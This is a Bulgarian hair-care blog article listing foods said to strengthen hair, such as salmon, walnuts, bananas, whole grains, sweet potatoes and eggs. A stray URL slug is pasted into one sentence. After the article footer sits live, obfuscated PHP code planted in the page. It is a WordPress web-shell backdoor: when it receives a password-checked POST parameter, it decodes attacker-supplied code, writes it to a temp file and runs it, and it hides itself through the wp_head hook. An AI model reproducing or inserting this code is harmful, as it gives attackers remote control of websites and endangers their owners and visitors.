Какво да ядем за здрава и красива коса | Косопад

Какво да ядем за здрава и красива коса

Състоянието на косата ни е един от знаците какво е здравето на тялото ни. Когато имаме блестяща и силна коса, означава, че сме в добро състояние. Когато обаче косата ни е без блясък, суха и чуплива, значи може да има някакъв здравословен проблем. Подхранването е едно от най- важните неща, за да имаме красива и здрава коса. Кои храни можем да ядем, за да имаме здрава коса?

Здравето на косата и храненето

Лошото хранене се отразява веднага на косата ни. Ако не приемаме необходимите ни вещества, след няколко месеца ще започне да си личи по косата ни. Космените фоликули и скалпа се подхранват от нашата храна също – разнообразното хранене, в което приемаме достатъчно протеини, е ключът към здравата и красивата коса.

ХРАНИ ЗА ЗДРАВА КОСА

Сьомга. Съдържа протеини, витамин Д и омега- 3 мазнини. Особено последните подхранват много скалпа и стимулират баланса на естествените мазнини, като поддържат косата добре хидратирана.

Орехи. Също като сьомгата са богати на много омега- 3, а съдържат и витамин Е и биотин , които предпазват клеткитеhrana-sreshtu-kosopad на тялото от слънцето и от косопад. Богати са и на мед, така че ще поддържат жив цвета на косата и блестяща. Орехите са и важен източник на цинк, който е много важен за косата.

Банани. Витамин В е фундаментален за здравето на косата ни. Когато не ни достига, косата изтънява и става чуплива. Бананите са много подходящ източник на витамин В6.

Пълнозърнести храни. Съдържат сложни въглехидрати и протеини, които правят косата силна и жизнена. Също така има витамин В, желязо и цинк.

Батати. Отличен източник на бетакаротени, антиоксидант, който в организма се превръща във витамин А. Недостига на витамин А причинява пърхот, така че ако имате този проблем, яжте батати.

Яйца. Освен че са важни източници на протеини, също така съдържат селен, цинк и желязо. Последния минерал е особено важен при анемия, която често води до косопад.

02. май 2014 19:45:05 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}